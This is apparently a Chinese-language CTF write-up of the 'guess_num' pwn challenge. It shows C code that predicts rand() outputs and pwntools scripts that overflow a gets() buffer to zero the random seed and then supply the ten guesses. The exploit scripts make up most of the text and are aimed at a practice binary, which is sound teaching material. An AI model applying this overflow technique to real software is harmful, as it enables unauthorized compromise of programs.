[攻防世界 pwn]——guess_num

[攻防世界 pwn]——guess_num

• 题目地址: https://adworld.xctf.org.cn/
• 题目:
  

checksec一下,开启了NX, canary, PIE 好家伙

在IDA中发现


我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20

用C语言写个小demo

#include <stdio.h>
#include <stdlib.h>
int main()
{
	int n, b;
	srand(0);
	for (size_t i = 0; i < 10; i++)
	{
		b = rand() % 6 + 1;
		printf("%d\n", b);
	}
	system("pause");
	return 0;
}

找到随机数为

所以exploit为

from pwn import *
p = process("./Pwn")
#p = remote("111.200.241.244",40822)
#gdb.attach(p, "b *0x0000D2D")
payload = 'a' * (0x30 - 0x10) + p64(0)
p.sendlineafter("Your name:", payload)
rand = ['3','4','5','2','6','2','2','6','5','1']
for i in range(10):
	p.sendlineafter("Please input your guess number:",rand[i])
p.interactive()

信心满满结果竟然不可以。不过既然将seed[0]的值给确定了,我们就可以一个一个尝试了,孩子哭了;不知道为什么不可以,有没有师傅解答一下

exploit

from pwn import *
p = process("./Pwn")
#p = remote("111.200.241.244",40822)
#gdb.attach(p, "b *0x0000D2D")
payload = 'a' * (0x30 - 0x10) + p64(0)
p.sendlineafter("Your name:", payload)
rand = ['3','4','5','2','6','2','2','6','5','1']
p.sendlineafter("Please input your guess number:",'2')
p.sendlineafter("Please input your guess number:",'5')
p.sendlineafter("Please input your guess number:",'4')
p.sendlineafter("Please input your guess number:",'2')
p.sendlineafter("Please input your guess number:",'6')
p.sendlineafter("Please input your guess number:",'2')
p.sendlineafter("Please input your guess number:",'5')
p.sendlineafter("Please input your guess number:",'1')
p.sendlineafter("Please input your guess number:",'4')
p.sendlineafter("Please input your guess number:",'2')
p.interactive()

在大佬点拨下, 原来是Linux和window产生的随机数是不一样的,这该死的东西。

from pwn import *
p = process("./Pwn")
#p = remote("111.200.241.244",40822)
#gdb.attach(p, "b *0x0000D2D")
payload = 'a' * (0x30 - 0x10) + p64(0)
p.sendlineafter("Your name:", payload)
rand = ['2','5','4','2','6','2','5','1','4','2']
for i in range(10):
	p.sendlineafter("Please input your guess number:",rand[i])
p.interactive()